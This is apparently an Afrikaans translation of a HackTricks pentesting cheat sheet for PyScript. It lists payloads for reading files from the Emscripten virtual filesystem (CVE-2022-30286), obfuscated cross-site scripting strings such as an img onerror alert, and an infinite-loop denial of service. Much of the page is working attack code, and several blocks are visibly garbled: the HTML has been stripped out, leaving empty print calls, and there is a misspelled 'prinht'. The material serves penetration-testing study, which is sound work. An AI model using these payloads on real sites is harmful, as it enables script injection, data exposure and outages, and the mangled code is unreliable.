# Pyscript
{{#include ../../banners/hacktricks-training.md}}
## PyScript Pentesting Gids
PyScript is 'n nuwe raamwerk wat ontwikkel is om Python in HTML te integreer sodat dit saam met HTML gebruik kan word. In hierdie spiekbrief sal jy vind hoe om PyScript vir jou penetrasietoetsdoeleindes te gebruik.
### Dumping / Herwin van lĂȘers uit die Emscripten virtuele geheue lĂȘerstelsel:
`CVE ID: CVE-2022-30286`\
\
Kode:
```html
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin: out
= fin.read() print(out)
```
### [OOB Data Exfiltration van die Emscripten virtuele geheue lĂȘerstelsel (konsole monitering)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)
`CVE ID: CVE-2022-30286`\
\
Code:
```html
x = "CyberGuy" if x == "CyberGuy": with
open('/lib/python3.10/asyncio/tasks.py') as output: contents = output.read()
print(contents) print('
')
```
### Cross Site Scripting (Gewone)
Code:
```python
print("
")
```
### Cross Site Scripting (Python Obfuscated)
Kode:
```python
sur = "\u0027al";fur = "e";rt = "rt"
p = "\x22x$$\x22\x29\u0027\x3E"
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
e = "c\u003d";q = "x"
y = "o";m = "ner";z = "ror\u003d"
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
```
### Cross Site Scripting (JavaScript Obfuscation)
Kode:
```html
prinht("
")
```
### DoS-aanval (Oneindige lus)
Kode:
```html
while True:
print(" ")
```
{{#include ../../banners/hacktricks-training.md}}